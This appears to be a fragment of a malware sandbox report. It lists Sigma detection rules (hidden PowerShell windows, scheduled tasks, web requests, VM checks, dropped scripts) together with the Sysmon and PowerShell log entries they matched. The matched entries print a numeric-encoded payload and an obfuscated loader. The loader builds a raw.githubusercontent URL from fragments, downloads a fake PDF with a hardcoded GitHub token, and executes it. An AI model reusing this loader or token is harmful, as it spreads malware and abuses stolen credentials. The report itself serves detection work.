"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe $VIUSBvejbawf = \\132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 163 143 142 34 19 51 67 60 44 80 54 44 54 103 104 156 193 189 122 104 92 101 33 18 25 123 104 83 115 86 44 42 46 46 90 180 155 101 119 100 103 36 34 90 86 68 43 43 46 46 57 34 44 87 109 108 156 109 101 111 101 76 99 52 62 54 99 117 57 54 31 50 145 109 118 87 141 96 164 79 34 15 61 59 77 76 95 54 77 35 70 125 103 137 [TRUNCATED]",
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5e2ea8c055dd73ea66238735323d0318c2a6c114047137146357b85f764b1101",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell WindowStyle Option",
"rule_description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden.\n",
"rule_author": "frack113, Tim Shelton (fp AWS)",
"match_context": [
{
"values": {
"ScriptBlockText": "$VIUSBvejbawf = \"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 163 143 142 34 19 51 67 60 44 80 54 44 54 103 104 156 193 189 122 104 92 101 33 18 25 123 104 83 115 86 44 42 46 46 90 180 155 101 119 100 103 36 34 90 86 68 43 43 46 46 57 34 44 87 109 108 156 109 101 111 101 76 99 52 62 54 99 117 57 54 31 50 145 109 118 87 141 96 164 79 34 15 61 59 77 76 95 54 77 35 70 125 103 137 126 106 111 124 31 65 84 101 121 51 73 103 88 46 109 86 1 [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "85d62d20-3973-47f4-8ce4-0835db8caaec",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"Path": "C:\\Users\\azure\\AppData\\Roaming\\firefox.ps1",
"ScriptBlockId": "3b915775-03e4-45e0-8557-f47a61e601b9",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$VIUSBvejbawf = \"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 163 143 142 34 19 51 67 60 44 80 54 44 54 103 104 156 193 189 122 104 92 101 33 18 25 123 104 83 115 86 44 42 46 46 90 180 155 101 119 100 103 36 34 90 86 68 43 43 46 46 57 34 44 87 109 108 156 109 101 111 101 76 99 52 62 54 99 117 57 54 31 50 145 109 118 87 141 96 164 79 34 15 61 59 77 76 95 54 77 35 70 125 103 137 126 106 111 124 31 65 84 101 121 51 73 103 88 46 109 86 1 [TRUNCATED]",
"Path": "",
"ScriptBlockId": "229e1e92-0db6-4cb6-8e02-9d51a641b840",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "a3b3e22e-686b-46a0-a40e-58e067e974d4",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "$VIUSBvejbawf = \"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 163 143 142 34 19 51 67 60 44 80 54 44 54 103 104 156 193 189 122 104 92 101 33 18 25 123 104 83 115 86 44 42 46 46 90 180 155 101 119 100 103 36 34 90 86 68 43 43 46 46 57 34 44 87 109 108 156 109 101 111 101 76 99 52 62 54 99 117 57 54 31 50 145 109 118 87 141 96 164 79 34 15 61 59 77 76 95 54 77 35 70 125 103 137 126 106 111 124 31 65 84 101 121 51 73 103 88 46 109 86 1 [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "2064c2c0-8c3e-4c17-9b08-7a213679007f",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "60d527fe5a592cbe8e98428d1412743b909d5625ec8bc91d20e8b6ee8b36db20",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Create Scheduled Task",
"rule_description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"Path": "C:\\Users\\azure\\AppData\\Roaming\\firefox.ps1",
"ScriptBlockId": "3b915775-03e4-45e0-8557-f47a61e601b9",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "a3b3e22e-686b-46a0-a40e-58e067e974d4",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "1f5b0260-b64c-4c71-919a-50f95fc9230c",
"Path": "C:\\Users\\DeiYyGyatKlH\\AppData\\Roaming\\firefox.ps1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6291f85314c7d9966be831c56d3cdfb30f42c84f599273e73dac5c95e1122abf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs",
"rule_author": "James Pemberton / @4A616D6573",
"match_context": [
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "3b915775-03e4-45e0-8557-f47a61e601b9",
"Path": "C:\\Users\\azure\\AppData\\Roaming\\firefox.ps1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "a3b3e22e-686b-46a0-a40e-58e067e974d4",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$sdvbsdvgiiiiiiiiiiiiidesdddd = Join-Path $env:AppData \"Microsoft\";\r\n$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$dhfjkg= \"sdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$CCCCCCscscsc = \"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\"\r\n\r\n$derrhfjkg= \"sdjkdgdgd [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "9041ba4e-0bf3-4ae9-a784-38d92600ccac",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\bpvme.ps1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"ScriptBlockId": "eaea2ba0-04ac-4d70-9840-73066d7d03e1",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "1f5b0260-b64c-4c71-919a-50f95fc9230c",
"Path": "C:\\Users\\DeiYyGyatKlH\\AppData\\Roaming\\firefox.ps1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6e1823de286f8bef414c648f5738bec3bd40700cba3765da26e6500bc2d8e387",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Detect Virtualization Environment",
"rule_description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.\n",
"rule_author": "frack113, Duc.Le-GTSC",
"match_context": [
{
"values": {
"ScriptBlockText": "$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$sdvbsdvgiiiiiiiiiiiiidesdddd = Join-Path $env:AppData \"Microsoft\";\r\n$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$dhfjkg= \"sdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$CCCCCCscscsc = \"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\"\r\n\r\n$derrhfjkg= \"sdjkdgdgd [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "9041ba4e-0bf3-4ae9-a784-38d92600ccac",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\bpvme.ps1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking for the \"powershell\" process whose parent is not a user GUI process such as \"explorer.exe\" (here the parent is itself powershell.exe).",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe $VIUSBvejbawf = \\132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 163 143 142 34 19 51 67 60 44 80 54 44 54 103 104 156 193 189 122 104 92 101 33 18 25 123 104 83 115 86 44 42 46 46 90 180 155 101 119 100 103 36 34 90 86 68 43 43 46 46 57 34 44 87 109 108 156 109 101 111 101 76 99 52 62 54 99 117 57 54 31 50 145 109 118 87 141 96 164 79 34 15 61 59 77 76 95 54 77 35 70 125 103 137 [TRUNCATED]",
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\<USER>\\AppData\\Roaming\\firefox.ps1",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7cf0b126730658e7c96da1ae0b63c1bb84154a239ca32c09909963038dfdcacf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script Dropped Via PowerShell.EXE",
"rule_description": "Detects PowerShell creating a PowerShell file (.ps1). While this behavior is often benign, it can be a sign of a dropper script trying to achieve persistence.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "11"
}
},
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\wale.ps1"
}
},
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\bpvme.ps1",
"EventID": "11"
}
}
]
},
{
"rule_level": "low",
"rule_id": "80e1441e8251586c742da610b4bceb4d94fbe79f4e8b64b9745b6a11da90d7c1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script With File Upload Capabilities",
"rule_description": "Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$sdvbsdvgiiiiiiiiiiiiidesdddd = Join-Path $env:AppData \"Microsoft\";\r\n$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$dhfjkg= \"sdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$CCCCCCscscsc = \"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\"\r\n\r\n$derrhfjkg= \"sdjkdgdgd [TRUNCATED]",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\bpvme.ps1",
"ScriptBlockId": "9041ba4e-0bf3-4ae9-a784-38d92600ccac",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "low",
"rule_id": "b0d225f3239543a37159ba2855ee1e7972c6bff3c83ce7aed9056599f6ee6314",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Process Discovery With Get-Process",
"rule_description": "Detects use of the Get-Process cmdlet, which lists the processes running on the local computer and can serve an adversary as process discovery.",
"rule_author": "frack113",
"match_context": [
{
"values": {
